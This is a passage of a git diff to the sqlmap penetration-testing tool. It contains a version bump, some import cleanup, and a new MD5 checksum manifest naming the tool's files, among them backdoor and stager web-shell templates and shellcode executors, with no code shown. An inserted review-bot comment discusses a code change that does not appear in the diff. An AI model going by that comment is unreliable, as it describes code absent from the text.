     threadData.reset()
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 28ae3253d0b..92f318a2391 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@
 from lib.core.enums import OS
 
 # sqlmap version (...)
-VERSION = "1.2.6.33"
+VERSION = "1.2.6.35"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/lib/utils/api.py b/lib/utils/api.py
index 543aa75e96c..4d6316eeda4 100644
--- a/lib/utils/api.py
+++ b/lib/utils/api.py
@@ -33,10 +33,10 @@
 from lib.core.data import logger
 from lib.core.datatype import AttribDict
 from lib.core.defaults import _defaults
+from lib.core.dicts import PART_RUN_CONTENT_TYPES
 from lib.core.enums import AUTOCOMPLETE_TYPE
 from lib.core.enums import CONTENT_STATUS
 from lib.core.enums import MKSTEMP_PREFIX
-from lib.core.enums import PART_RUN_CONTENT_TYPES
 from lib.core.exception import SqlmapConnectionException
 from lib.core.log import LOGGER_HANDLER
 from lib.core.optiondict import optDict
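Review bot: The new `if conf.dummy: conf.batch = True` in `_cleanupOptions` silently overrides whatever the user set for `batch`, and nothing says why dummy mode implies it; a comment such as `# dummy mode is meant to run unattended, so imply --batch and never block on a prompt` would make the intent explicit (the purpose of `dummy` is inferred from its name here — adjust the wording if it means something else). If `conf.dummy` is not always populated like the sibling options read just above it, this line would also raise on a missing attribute, which cannot be checked from the hunk. `_cleanupOptions` continues outside the hunk.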
@@ -45,9 +45,6 @@
 from lib.core.settings import RESTAPI_DEFAULT_ADDRESS
 from lib.core.settings import RESTAPI_DEFAULT_PORT
 from lib.core.shell import autoCompletion
-from lib.core.shell import clearHistory
-from lib.core.shell import loadHistory
-from lib.core.shell import saveHistory
 from lib.core.subprocessng import Popen
 from lib.parse.cmdline import cmdLineParser
 from thirdparty.bottle.bottle import error as return_error
diff --git a/txt/checksum.md5 b/txt/checksum.md5
new file mode 100644
index 00000000000..5ddc8ad89b0
--- /dev/null
+++ b/txt/checksum.md5
@@ -0,0 +1,477 @@ +4cb52d99ae953f04fb0f17825b0dabc4 extra/beep/beep.py +1e5532ede194ac9c083891c2f02bca93 extra/beep/__init__.py +b0eb597c613afeff9d62898cf4c67a56 extra/cloak/cloak.py +1e5532ede194ac9c083891c2f02bca93 extra/cloak/__init__.py +e0911386106b95d2ba4b12d651b2eb16 extra/dbgtool/dbgtool.py +1e5532ede194ac9c083891c2f02bca93 extra/dbgtool/__init__.py +acba8b5dc93db0fe6b2b04ff0138c33c extra/icmpsh/icmpsh.exe_ +708e9fd35dabcbfcd10e91bbc14f091f extra/icmpsh/icmpsh_m.py +2d020d2bdcee1170805f48839fdb89df extra/icmpsh/__init__.py +1e5532ede194ac9c083891c2f02bca93 extra/__init__.py +fe141ec3178a46e7151c7f34bb747c68 extra/mssqlsig/update.py +ff90cb0366f7cefbdd6e573e27e6238c extra/runcmd/runcmd.exe_ +1e5532ede194ac9c083891c2f02bca93 extra/safe2bin/__init__.py +b6c0f2047e9bea90f4d5c5806c0f6a9a extra/safe2bin/safe2bin.py +d229479d02d21b29f209143cb0547780 extra/shellcodeexec/linux/shellcodeexec.x32_ +2fe2f94eebc62f7614f0391a8a90104f extra/shellcodeexec/linux/shellcodeexec.x64_ +c55b400b72acc43e0e59c87dd8bb8d75 extra/shellcodeexec/windows/shellcodeexec.x32.exe_ +220745c50d375dad7aefebf8ca3611ef extra/shutils/duplicates.py +e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py +71b9d4357c31db013ecda27433830090 extra/shutils/pylint.py +1056d1112ba5130868178cb495d22b1d extra/shutils/regressiontest.py +1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py +b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py +0f581182871148b0456a691ae85b04c0 lib/controller/action.py +94872ce72dc2628cdedf2eb82cba716e lib/controller/checks.py +c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py +c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py +1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py +0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py +fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py +6165b8a826803b29c479d47a60e8dbf6 lib/core/common.py +0d082da16c388b3445e656e0760fb582 lib/core/convert.py +9f87391b6a3395f7f50830b391264f27 
lib/core/data.py +72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py +4086fb55f42e27de5330505605baad0f lib/core/decorators.py +fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py +98b730cef6a59ab044a108276aef6f42 lib/core/dicts.py +9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py +ab3f4f3e3019add5f4a2e28f7e8748a4 lib/core/enums.py +cada93357a7321655927fc9625b3bfec lib/core/exception.py +1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py +458a194764805cd8312c14ecd4be4d1e lib/core/log.py +e9e32e5afe49ecd644b3a0ca9c9a36fc lib/core/optiondict.py +5d25911fbd379c32d5bf918c79febc0b lib/core/option.py +c8c386d644d57c659d74542f5f57f632 lib/core/patch.py +6783160150b4711d02c56ee2beadffdb lib/core/profiling.py +6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py +0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py +a7db43859b61569b601b97f187dd31c5 lib/core/revision.py +fcb74fcc9577523524659ec49e2e964b lib/core/session.py +4742105fe7dd3964e11961c44cf9e851 lib/core/settings.py +dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py +a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py +36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py +72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py +de9922a29c71a235cb95a916ff925db2 lib/core/threads.py +c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py +9d395b143be295a143eb5c9b926f3569 lib/core/update.py +e772deb63270375e685fa5a7b775c382 lib/core/wordlist.py +1e5532ede194ac9c083891c2f02bca93 lib/__init__.py +7620f1f4b8791e13c7184c06b5421754 lib/parse/banner.py +2b3b021a8e7e119d0553c02b110d07d9 lib/parse/cmdline.py +fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py +3794ff139869f5ae8e81cfdbe5714f56 lib/parse/handler.py +6bab53ea9d75bc9bb8169d3e8f3f149f lib/parse/headers.py +1bc6ddaeada0f2425fa9aae226854ca8 lib/parse/html.py +1e5532ede194ac9c083891c2f02bca93 lib/parse/__init__.py +f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py +492654567e72b6a14584651fcd9f16e6 lib/parse/sitemap.py 
+30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py +2b81435f5a7519298c15c724e3194a0d lib/request/basic.py +c0cabedead14b8a23353b606672cff42 lib/request/comparison.py +1b5491cc079384f08cbc6b397786e1af lib/request/connect.py +dd4598675027fae99f2e2475b05986da lib/request/direct.py +2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py +98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py +1e5532ede194ac9c083891c2f02bca93 lib/request/__init__.py +c2fb1abbb7127ec6419bbf852c0a458d lib/request/inject.py +aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py +51eeaa8abf5ba62aaaade66d46ff8b00 lib/request/pkihandler.py +2c3774b72586985719035b195f144d7b lib/request/rangehandler.py +aa809d825b33bea76a63ecd97cf7792c lib/request/redirecthandler.py +7f12d8f3b6665ed7053954bba70ff718 lib/request/templates.py +747f9941a68361bd779ec760f71568e9 lib/takeover/abstraction.py +acc1db3667bf910b809eb279b60595eb lib/takeover/icmpsh.py +1e5532ede194ac9c083891c2f02bca93 lib/takeover/__init__.py +46ff5840b29531412bcaa05dac190413 lib/takeover/metasploit.py +fb9e34d558293b5d6b9727f440712886 lib/takeover/registry.py +48575dde7bb867b7937769f569a98309 lib/takeover/udf.py +f6f835e4190a55e42d13c1e7ca3f728f lib/takeover/web.py +f1decf0a987bd3a4bc757212cbe6a6c8 lib/takeover/xp_cmdshell.py +4a7f231e597f754e9fcd116d13ad1a4d lib/techniques/blind/inference.py +1e5532ede194ac9c083891c2f02bca93 lib/techniques/blind/__init__.py +1e5532ede194ac9c083891c2f02bca93 lib/techniques/dns/__init__.py +799faf9008527d2e9da9d923e50f685a lib/techniques/dns/test.py +48a24f48da791e67309003fd5e8428cb lib/techniques/dns/use.py +1e5532ede194ac9c083891c2f02bca93 lib/techniques/error/__init__.py +f5fb02487edaf9adaa81d54324c84f8f lib/techniques/error/use.py +1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py +1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py +94d7a22bb6725a91e84ba2cd9973e96d lib/techniques/union/test.py +11ecf2effbe9f40b361843d546c3c521 
lib/techniques/union/use.py +77ff35587af9e3dfde63b8327e230f9a lib/utils/api.py +37dfb641358669f62c2acedff241348b lib/utils/brute.py +31b1e7eb489eac837db6a2bc1dcb7da7 lib/utils/crawler.py +de9620f03231d8329ee8434884b6bacd lib/utils/deps.py +f7af65aa47329d021e2b2cc8521b42a4 lib/utils/getch.py +7af29f61302c8693cd6436d4b69e22d3 lib/utils/har.py +062e4e8fc43ac54305a75ddd0d482f81 lib/utils/hashdb.py +cc1cfe36057f1d9bbdcba1bcc03359f9 lib/utils/hash.py +011d2dbf589e0faa0deca61a651239cc lib/utils/htmlentities.py +1e5532ede194ac9c083891c2f02bca93 lib/utils/__init__.py +010d8327239d33af4ce9f25683cfc012 lib/utils/pivotdumptable.py +5cb78b0e60fd7fd84502d62cf85d2064 lib/utils/progress.py +0ec5cec9d93d5ffd1eaeda6e942ecadf lib/utils/purge.py +2c5a655c8e94cbe2664ee497752ac1f2 lib/utils/search.py +571884f530796534f03c49cf3f380a4c lib/utils/sqlalchemy.py +dcc25183c6bd85b172c87cfcbc305ab6 lib/utils/timeout.py +fad14adffa8b640a15b06db955031695 lib/utils/versioncheck.py +e9e73cd6bd814dd7823a9da913cea61c lib/utils/xrange.py +b9d2761f47fec3d98b88311a263fd5db plugins/dbms/access/connector.py +3f1c50a1507d1c2f69c20c706230e2e2 plugins/dbms/access/enumeration.py +fcc66fc377db3681f7890ec55675564b plugins/dbms/access/filesystem.py +c2428c5c73d049abf4442ec1b9404a25 plugins/dbms/access/fingerprint.py +e657b1b7a295a38ac9ce515158164f00 plugins/dbms/access/__init__.py +77686d7c7e287d5db0a9a87f2c7d4902 plugins/dbms/access/syntax.py +2f1d8706b51497623b2b59c07b552bdc plugins/dbms/access/takeover.py +8df07c2805aceb7d6fb4add40de84795 plugins/dbms/db2/connector.py +4deeda463003ab71e7d2f34a263b5bbf plugins/dbms/db2/enumeration.py +da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/db2/filesystem.py +b54dbf44590a5cbefb2b4f8e9a01a383 plugins/dbms/db2/fingerprint.py +95b35cbd859bbced44e7f8fd84486d75 plugins/dbms/db2/__init__.py +82d96d8fcfd565129580260040555623 plugins/dbms/db2/syntax.py +25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/db2/takeover.py +53bd7de27d37958f543f5329362ac298 
plugins/dbms/firebird/connector.py +bc4d71116d7296d63894484f2e60ade2 plugins/dbms/firebird/enumeration.py +c3ca81000200e5ab4210e9bf2e04ce93 plugins/dbms/firebird/filesystem.py +bd2159afbe83c70059f57712b4ae0189 plugins/dbms/firebird/fingerprint.py +d4ea3036492b8ae15340548b2936021f plugins/dbms/firebird/__init__.py +c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py +1522a29bd4b54ea78bb2855fc32b6c72 plugins/dbms/firebird/takeover.py +271a7f16e781d56a0a31a3d5515a1945 plugins/dbms/hsqldb/connector.py +95919592e5bb83df00b99bb9e8a70977 plugins/dbms/hsqldb/enumeration.py +616595e74ecb644271cbbd31815d92e0 plugins/dbms/hsqldb/filesystem.py +b7d693a6f5f39fee0a65f2d7b0830c5e plugins/dbms/hsqldb/fingerprint.py +fd369161778d6b48d7f1f7fc14dcdb5c plugins/dbms/hsqldb/__init__.py +4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/hsqldb/syntax.py +7c0535736215ca612756cf589adb249b plugins/dbms/hsqldb/takeover.py +97dac442190bd4ffac3ba292e2abfd4c plugins/dbms/informix/connector.py +c54d70e4847c6327bd3110c4d8723b04 plugins/dbms/informix/enumeration.py +da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/informix/filesystem.py +35eac2f3837a72940eb50753dc4566e5 plugins/dbms/informix/fingerprint.py +9dac94c8f76acf0be65b6c57ecdb5c34 plugins/dbms/informix/__init__.py +aa77fec4fe6b2d7ca4a91aebd9ff4e21 plugins/dbms/informix/syntax.py +25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/informix/takeover.py +1e5532ede194ac9c083891c2f02bca93 plugins/dbms/__init__.py +6917f9b045f6188b89e816dea9b46a3f plugins/dbms/maxdb/connector.py +f33efaab1695dc9885ebae3f6072fffa plugins/dbms/maxdb/enumeration.py +ffd26f64142226d0b1ed1d70f7f294c0 plugins/dbms/maxdb/filesystem.py +9f9f1c4c4c3150545c4b61d1cffc76a8 plugins/dbms/maxdb/fingerprint.py +4321d7018f5121343460ebfd83bb69be plugins/dbms/maxdb/__init__.py +e7d44671ae26c0bcd5fe8448be070bbd plugins/dbms/maxdb/syntax.py +bf7842bb291e2297c3c8d1023eb3e550 plugins/dbms/maxdb/takeover.py +decc645344bb93aca504a71ba2e4cad4 plugins/dbms/mssqlserver/connector.py 
+f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py +177e1d55d28ed3190bc0079b8126c6be plugins/dbms/mssqlserver/filesystem.py +08914da79141713bd69a25c3cc7f06a8 plugins/dbms/mssqlserver/fingerprint.py +f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py +612be1929108e7b4512a49a4a3837bbc plugins/dbms/mssqlserver/syntax.py +3c0845fa526e1bb7bbe636fcfcbcc4a6 plugins/dbms/mssqlserver/takeover.py +f6e1f3f09f32b9cb2ca11c016d373423 plugins/dbms/mysql/connector.py +445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py +4578fa29f04d0a75499f9668466ded07 plugins/dbms/mysql/filesystem.py +fcbf7ff279c527b4aca0dac94c28d20c plugins/dbms/mysql/fingerprint.py +30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py +0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py +403591e638b6bfdb840d52bd3138ee56 plugins/dbms/mysql/takeover.py +f772070dba85976a7894dac5046b93ea plugins/dbms/oracle/connector.py +e1ffee36fd18f33f34bb4bac4ae43f14 plugins/dbms/oracle/enumeration.py +c326b0d8bed92be67888b0242f565ac8 plugins/dbms/oracle/filesystem.py +538395c0e5ccb1b6befc17f129f45f29 plugins/dbms/oracle/fingerprint.py +9cbce3d3747c67f18e65f9c1eb910b0e plugins/dbms/oracle/__init__.py +5c2f1611c3ceface38a7e95650391ae6 plugins/dbms/oracle/syntax.py +bcdbd9c04d7d5a911e0e31abe1a24f0f plugins/dbms/oracle/takeover.py +f99c23db4ee6a6b8c0edbf684d360ad3 plugins/dbms/postgresql/connector.py +7cdb821884e5f15084d1bea7f8a50574 plugins/dbms/postgresql/enumeration.py +c8bb829d45752b98e6a03817b92e0fe5 plugins/dbms/postgresql/filesystem.py +29560cf78211888802c6e5c8681e7d71 plugins/dbms/postgresql/fingerprint.py +470860d3e85d11a67f2220bffaa415e7 plugins/dbms/postgresql/__init__.py +20e6f48f496348be45f3402ebc265dbb plugins/dbms/postgresql/syntax.py +1287acf330da86a93c8e64aff46e3b65 plugins/dbms/postgresql/takeover.py +80a2083a4fb7809d310c3d5ecc94e3c5 plugins/dbms/sqlite/connector.py +5194556e6b1575b1349f8ccfd773952b plugins/dbms/sqlite/enumeration.py 
+90fa97b84998a01dba7cc8c3329a1223 plugins/dbms/sqlite/filesystem.py +ed52c198f3346ceabdef676e9f5d3c0f plugins/dbms/sqlite/fingerprint.py +f639120d42b33b6ca67930bddbf2ac1f plugins/dbms/sqlite/__init__.py +964e59d2eba619b068b0a15cea28efe0 plugins/dbms/sqlite/syntax.py +3364b2938d7040c507cd622c323557dc plugins/dbms/sqlite/takeover.py +9e64e67291a4c369bad8b8cf2cfa722a plugins/dbms/sybase/connector.py +426698152f63504061e5875e64957691 plugins/dbms/sybase/enumeration.py +74de450dd6d6d006aa9c7eed56e6b09a plugins/dbms/sybase/filesystem.py +c8ee0deaa2309e96d9a409ff1524f3ad plugins/dbms/sybase/fingerprint.py +a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py +36acb9a5966af21b32e8558b0d50653d plugins/dbms/sybase/syntax.py +79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py +34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py +e6cd1c5a5244d83396b401f7db43d323 plugins/generic/custom.py +156c227dbe765da3d0fd2976fbe18d8b plugins/generic/databases.py +4e2b366bb9cfdaaed719b219913357c6 plugins/generic/entries.py +d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py +0c8abe66a78edca0660bfb8049d109e2 plugins/generic/filesystem.py +f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py +1e5532ede194ac9c083891c2f02bca93 plugins/generic/__init__.py +f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py +b1d2a7f3170f9b69e71335aa47f9b08b plugins/generic/search.py +a70cc0ada4b0cc9e7df23cb6d48a4a0c plugins/generic/syntax.py +e522c294676ede15bee751107e9bb449 plugins/generic/takeover.py +4419b13a4b78d7e9e4a2632302344a1a plugins/generic/users.py +1e5532ede194ac9c083891c2f02bca93 plugins/__init__.py +5dc693e22f5d020c5c568d7325bd4226 shell/backdoors/backdoor.asp_ +158bfa168128393dde8d6ed11fe9a1b8 shell/backdoors/backdoor.aspx_ +595f711adf1ecb5f3b9a64532b04d8b9 shell/backdoors/backdoor.jsp_ +09fc3ed6543f4d1885e338b271e5e97a shell/backdoors/backdoor.php_ +ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 
+4e6d2094bd6afe35032fb8bc8a86e83c shell/stagers/stager.aspx_ +0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ +2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ +4eaeef94314956e4517e5310a28d579a sqlmapapi.py +b6e9d67cafb85ff2c3fde165fc577a8d sqlmap.py +1a1e3a78ded58b240c9dbb1b17996acf tamper/0x2char.py +4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py +4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py +d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py +0298d81e9dfac7ff18a5236c0f1d84b6 tamper/base64encode.py +9a3da4aa7b220448aa3ecbb92f68330f tamper/between.py +e1d2329adc6ca89828a2eaec2951806c tamper/bluecoat.py +e3cdf13caedb4682bee3ff8fac103606 tamper/chardoubleencode.py +3b2f68476fbcf8223199e8dd4ec14b64 tamper/charencode.py +b502023ac6c48e49e652ba524b8e18cc tamper/charunicodeencode.py +2c2b38974dc773568de7e7d771d7042c tamper/charunicodeescape.py +6a395de07b60f47d9474ace0a98c160f tamper/commalesslimit.py +211bb8fa36a6ecb42b719c951c362851 tamper/commalessmid.py +6082358eb328d1cdd4587e73c95bbefc tamper/commentbeforeparentheses.py +334e4a2485b3a1bbc1734823b93ea694 tamper/concat2concatws.py +dcdc433fe946f1b9005bcd427a951dd6 tamper/equaltolike.py +06df880df5d8749963f5562f60fd1637 tamper/escapequotes.py +4393cc5220d2e39c5c9c5a9af4e2635d tamper/greatest.py +25ec62158d3e289bda8a04c8b65686ba tamper/halfversionedmorekeywords.py +9d8c350cbb90d4b21ec9c9db184a213a tamper/htmlencode.py +3f79551baf811ff70b2ba8795a2064be tamper/ifnull2casewhenisnull.py +e2c2b6a67546b36983a72f129a817ec0 tamper/ifnull2ifisnull.py +21665e68ef9f91b2395e81d2f341412d tamper/informationschemacomment.py +1e5532ede194ac9c083891c2f02bca93 tamper/__init__.py +2dc49bcd6c55f4e2322b07fa92685356 tamper/least.py +1834b5409c449d2ea1b70a5038fed9eb tamper/lowercase.py +de4c83d33968a0cbf00cdfd8d35deddc tamper/modsecurityversioned.py +39981d5d6cb84aca950458739102bb07 tamper/modsecurityzeroversioned.py +5ee5147612ebe4769a67a8e2305d62f7 tamper/multiplespaces.py 
+be757e4c9a6fb36af7b9a8c444fddb05 tamper/nonrecursivereplacement.py +e298e486c06bb39d81f10d61a5c4ceec tamper/overlongutf8more.py +b9f698556f8333d9fa6eadaab44a77ab tamper/overlongutf8.py +bc0363e4fc04240c9f7b81e4ecce0714 tamper/percentage.py +91272e566ceb4644254cd6abd613db21 tamper/plus2concat.py +265314f4b3b921f4c0d470ddaa6506e4 tamper/plus2fnconcat.py +e94a1c7e4dc7450ac224436269d823bb tamper/randomcase.py +6368a971a80b1acbbbc6b76616bd96b9 tamper/randomcomments.py +48228322d40d97016b05e408c5234634 tamper/securesphere.py +cac8a56f8cc6c14524ee392daa5ae2fd tamper/space2comment.py +62d4d07b640d9d54d26ba33a77de9474 tamper/space2dash.py +ab91c20f71973b1a9a5fecfb9f2a1d1f tamper/space2hash.py +18f827afce8322adfa0c6dfbb4a59379 tamper/space2morecomment.py +59e61a9dd1f1e6b79fde026ed771cac4 tamper/space2morehash.py +ad45e799126d2d563b3958f714d2e7c6 tamper/space2mssqlblank.py +74334d72bffb99b0ac092f87f4da2675 tamper/space2mssqlhash.py +fd1bff6caefe5007444f7a0fabbc8ce9 tamper/space2mysqlblank.py +48a1f013657186e336d249adefbdbc7b tamper/space2mysqldash.py +36958b2a5f5915de8b7cc157a64b267a tamper/space2plus.py +6ce135f89259c379d84c85e538300091 tamper/space2randomblank.py +95c91853034d9e276a6570e4d01b5f74 tamper/sp_password.py +041cb567dff6bb6e7389e12ab3fb84c6 tamper/symboliclogical.py +6459c62914ae643799667de8bd283c97 tamper/unionalltounion.py +3b8182b8caef857b9af397e47d0c9938 tamper/unmagicquotes.py +371afb396f0bb18d97147c5db83354f4 tamper/uppercase.py +557ce5bf5ae9b7ab26f2c6b57312f41a tamper/varnish.py +929a2586dbb7b758a454eb09e13e5a73 tamper/versionedkeywords.py +3aff4d344ebd4f38e033e73b63f84447 tamper/versionedmorekeywords.py +ed1acafbac707bfa71c72f76b81c1bdd tamper/xforwardedfor.py +368165b45dadcdff4422bc010700832a thirdparty/ansistrm/ansistrm.py +d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py +8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py +cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py 
+ff54a1d98f0ab01ba7b58b068d2ebd26 thirdparty/bottle/bottle.py +4528e6a7bb9341c36c425faf40ef32c3 thirdparty/bottle/__init__.py +b20f539dc45fa9e514c1eb4f5aa8b5c6 thirdparty/chardet/big5freq.py +44159687c2bae35f165b44f07f5f167a thirdparty/chardet/big5prober.py +c80b09e2a63b375c02c8c1e825a953c5 thirdparty/chardet/chardetect.py +d2c4ad8cc905d95f148ead169d249eb8 thirdparty/chardet/chardistribution.py +24c57085435b8ad1a7bf9ff4ffe6cce0 thirdparty/chardet/charsetgroupprober.py +0cb6549c5cf979c8023f8aaf3392a117 thirdparty/chardet/charsetprober.py +241dd3b7d3eb97ae384320fc8346c6ff thirdparty/chardet/codingstatemachine.py +73f2b9ae331ab011571a3b3a2c62acc1 thirdparty/chardet/compat.py +6cccf2eada7dfa841a5c39aaecb037e7 thirdparty/chardet/constants.py +dd0087e46f835b791a5c9904fcda2de3 thirdparty/chardet/cp949prober.py +ecf56c6473c5a9bc0540a1ca11ec998a thirdparty/chardet/escprober.py +00590b3c94c4db8f25639ab261e4c725 thirdparty/chardet/escsm.py +99bc93e45136ecd15d8dfb489059f118 thirdparty/chardet/eucjpprober.py +65b6b3e75845e033ce34c11ccdd85450 thirdparty/chardet/euckrfreq.py +cc2282aef66a161b3451f9cf455fdd7d thirdparty/chardet/euckrprober.py +f13fee8c7bd6db0e8c40030ccacdfbde thirdparty/chardet/euctwfreq.py +ca66f5277872165faa5140068794604a thirdparty/chardet/euctwprober.py +0fb5414fcc0bdb8b04af324015505c06 thirdparty/chardet/gb2312freq.py +84284584b8e29f50f40781205a9d4e76 thirdparty/chardet/gb2312prober.py +354a83d1bb3c20b4626b6c4ad54d163a thirdparty/chardet/hebrewprober.py +d91ddc14e31824faacd96fa88e42a6b8 thirdparty/chardet/__init__.py +03be91b7ead4725af61234d4852bb7ab thirdparty/chardet/jisfreq.py +b59a7b8b0debe197444bf831ba42bbe9 thirdparty/chardet/jpcntx.py +e4e05437410aa80cf9a13afac19997fe thirdparty/chardet/langbulgarianmodel.py +74ce958cbef2eee08a7a04fb4db41260 thirdparty/chardet/langcyrillicmodel.py +7090da7635347b767b4eb194f697207d thirdparty/chardet/langgreekmodel.py +22df1e2996355e4c082cc0b2f8dbe261 thirdparty/chardet/langhebrewmodel.py 
+3b86d62fe73022a609b2e8095edecf87 thirdparty/chardet/langhungarianmodel.py +4f941425be84ee4e1b7ccb7c4b31e8d8 thirdparty/chardet/langthaimodel.py +9e7400a368b70c1acccab78d2cc489cd thirdparty/chardet/latin1prober.py +c27857a02a65a1100f3195f95c50aff9 thirdparty/chardet/mbcharsetprober.py +719ecf479d507a3e6450aefbaa42fcc8 thirdparty/chardet/mbcsgroupprober.py +2fd9f3c93568c552779bd46990027c36 thirdparty/chardet/mbcssm.py +93349a5fa5cb824d1485cd5f3a53928a thirdparty/chardet/sbcharsetprober.py +ee25f2a03587e2c283eab0b36c9e5783 thirdparty/chardet/sbcsgroupprober.py +c9349824f2647962175d321cc0c52134 thirdparty/chardet/sjisprober.py +bcae4c645a737d3f0e7c96a66528ca4a thirdparty/chardet/universaldetector.py +6f8b3e25472c02fb45a75215a175991f thirdparty/chardet/utf8prober.py +3c1b0d627e98643b317244ecfd240bb5 thirdparty/clientform/clientform.py +722281d87fb13ec22555480f8f4c715b thirdparty/clientform/__init__.py +0b625ccefa6b066f79d3cbb3639267e6 thirdparty/colorama/ansi.py +93bb7f06c8300a91b533ea55e8aead43 thirdparty/colorama/ansitowin32.py +ed4d76c08741d34ac79f6488663345f7 thirdparty/colorama/initialise.py +c0707ca77ccb4a2c0f12b4085057193c thirdparty/colorama/__init__.py +ad3d022d4591aee80f7391248d722413 thirdparty/colorama/win32.py +cdd682cbf77137ef4253b77a95ed9bd8 thirdparty/colorama/winterm.py +be7eac2e6cfb45c5e297ec5eee66e747 thirdparty/fcrypt/fcrypt.py +e00542d22ffa8d8ac894c210f38454be thirdparty/fcrypt/__init__.py +2f94ddd6ada38e4091e819568e7c4b7c thirdparty/gprof2dot/gprof2dot.py +855372c870a23d46683f8aa39d75f6a1 thirdparty/gprof2dot/__init__.py +d41d8cd98f00b204e9800998ecf8427e thirdparty/__init__.py +e3b18f925d125bd17c7e7a7ec0b4b85f thirdparty/keepalive/__init__.py +e0c6a936506bffeed53ce106ec15942d thirdparty/keepalive/keepalive.py +d41d8cd98f00b204e9800998ecf8427e thirdparty/magic/__init__.py +bf318e0abbe6b2e1a167a233db7f744f thirdparty/magic/magic.py +d41d8cd98f00b204e9800998ecf8427e thirdparty/multipart/__init__.py +03c8abc17b228e59bcfda1f11a9137e0 
thirdparty/multipart/multipartpost.py +3e502b04f3849afbb7f0e13b5fd2b5c1 thirdparty/odict/__init__.py +127fe54fdb9b13fdac93c8fc9c9cad5e thirdparty/odict/odict.py +08801ea0ba9ae22885275ef65d3ee9dc thirdparty/oset/_abc.py +54a861de0f08bb80c2e8846579ec83bd thirdparty/oset/__init__.py +179f0c584ef3fb39437bdb6e15d9c867 thirdparty/oset/pyoset.py +94a4abc0fdac64ef0661b82aff68d791 thirdparty/prettyprint/__init__.py +ff80a22ee858f5331b0c088efa98b3ff thirdparty/prettyprint/prettyprint.py +5c70f8e5f7353aedc6d8d21d4fb72b37 thirdparty/pydes/__init__.py +a7f735641c5b695f3d6220fe7c91b030 thirdparty/pydes/pyDes.py +d41d8cd98f00b204e9800998ecf8427e thirdparty/socks/__init__.py +afd97f26bffa0532ee4eb4f5f8ec1ab7 thirdparty/socks/socks.py +d41d8cd98f00b204e9800998ecf8427e thirdparty/termcolor/__init__.py +ea649aae139d8551af513769dd913dbf thirdparty/termcolor/termcolor.py +bf55909ad163b58236e44b86e8441b26 thirdparty/wininetpton/__init__.py +a44e7cf30f2189b2fbdb635b310cdc0c thirdparty/wininetpton/win_inet_pton.py +855372c870a23d46683f8aa39d75f6a1 thirdparty/xdot/__init__.py +593473084228b63a12318d812e50f1e2 thirdparty/xdot/xdot.py +08c706478fad0acba049d0e32cbb6411 udf/mysql/linux/32/lib_mysqludf_sys.so_ +1501fa7150239b18acc0f4a9db2ebc0d udf/mysql/linux/64/lib_mysqludf_sys.so_ +70d83edb90c4a20bd95eb62f71c99bd0 udf/mysql/windows/32/lib_mysqludf_sys.dll_ +15aaa93872ca87366065568375ad8eb1 udf/mysql/windows/64/lib_mysqludf_sys.dll_ 